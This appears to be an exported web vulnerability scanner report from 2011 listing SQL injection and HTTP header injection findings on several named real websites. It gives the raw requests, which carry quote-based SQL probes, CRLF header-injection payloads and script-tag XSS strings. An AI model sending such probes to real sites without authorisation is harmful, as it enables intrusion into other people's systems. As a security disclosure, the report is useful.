<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="keywords" content="IT Solut ...[SNIP]...
1.13. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.outsourcingdotnetdevelopment.com
Path:
/outsourcing-dot-net-development-contact-us.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /outsourcing-dot-net-development-contact-us.html?1'=1 HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Proxy-Connection: keep-alive Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="keywords" content="IT Solut ...[SNIP]... </strong> Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1
Request 2
GET /outsourcing-dot-net-development-contact-us.html?1''=1 HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Proxy-Connection: keep-alive Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /xss-cross-site-scripting.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:03:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 171
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1
Request 2
GET /xss-cross-site-scripting.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:03:15 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=5rucoa6at9abkm1iohmum4tot6; path=/ Connection: close Content-Type: text/html Content-Length: 20709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="keywords" content="xss (cro ...[SNIP]...
1.15. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.outsourcingdotnetdevelopment.com
Path:
/xss-cross-site-scripting.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /xss-cross-site-scripting.html?1'=1 HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:02:47 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=csfbfupdfs7fadg0nmfn1lj946; path=/ Connection: close Content-Type: text/html Content-Length: 7658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="keywords" content="xss (cro ...[SNIP]... </strong> Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1
Request 2
GET /xss-cross-site-scripting.html?1''=1 HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:02:48 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=rmdtso7ajurlau4d8tk2uvoj34; path=/ Connection: close Content-Type: text/html Content-Length: 19753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="keywords" content="xss (cro ...[SNIP]...
The QUADIDX cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the QUADIDX cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1 HTTP/1.1 Host: www.phpbuilder.com Proxy-Connection: keep-alive Referer: http://www.phpbuilder.com/welcomead/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107'; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:02:03 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:03:03 GMT Content-Type: text/html Content-Length: 72630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>PHPBuilder.com, the best reso ...[SNIP]... <a href="/columns/tim20000705.php3">MySQL and PostgreSQL Compared</a> ...[SNIP]...
Request 2
GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1 HTTP/1.1 Host: www.phpbuilder.com Proxy-Connection: keep-alive Referer: http://www.phpbuilder.com/welcomead/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107''; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508
Response 2
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:02:04 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:03:04 GMT Content-Type: text/html Content-Length: 72646
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>PHPBuilder.com, the best reso ...[SNIP]...
2. HTTP header injectionpreviousnext There are 32 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 6d131%0d%0ac8d42010e20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /dot.gif6d131%0d%0ac8d42010e20?%r? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/dot.gif6d131 c8d42010e20: Date: Fri, 18 Feb 2011 15:53:42 GMT Server: GFE/2.0
The value of the ;n request parameter is copied into the Location response header. The payload a7230%0d%0a38761888e3a was submitted in the ;n parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110a7230%0d%0a38761888e3a&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:33 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qZQqABU0AAG@IOQw; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:33 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:33 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk163110218044733050ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:33 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110a7230 38761888e3a&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=163110218044733050&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1138
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the InternalReferralURL request parameter is copied into the Location response header. The payload 17105%0d%0a761b2c412d9 was submitted in the InternalReferralURL parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=17105%0d%0a761b2c412d9&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:46 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qrgqABU0AAFrNY7g; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:46 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:46 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk294110218044846981ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:46 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=17105 761b2c412d9&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=294110218044846981&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1138
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the LeadSiteURL request parameter is copied into the Location response header. The payload 57288%0d%0a1f8a21ef9e9 was submitted in the LeadSiteURL parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=57288%0d%0a1f8a21ef9e9&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:42 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qqgqABU0AAARrfuY; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:42 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:42 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk832110218044842248ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:42 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=57288 1f8a21ef9e9&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=832110218044842248&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 801
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the css request parameter is copied into the Location response header. The payload c2453%0d%0ad4fa898969d was submitted in the css parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=c2453%0d%0ad4fa898969d&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:01 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qgQqABU0AAEdKNII; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:01 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:01 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk516110218044801584ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:01 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=c2453 d4fa898969d&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=516110218044801584&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1054
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the ctnum request parameter is copied into the Location response header. The payload 9df03%0d%0a6d42c08a398 was submitted in the ctnum parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=9df03%0d%0a6d42c08a398&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
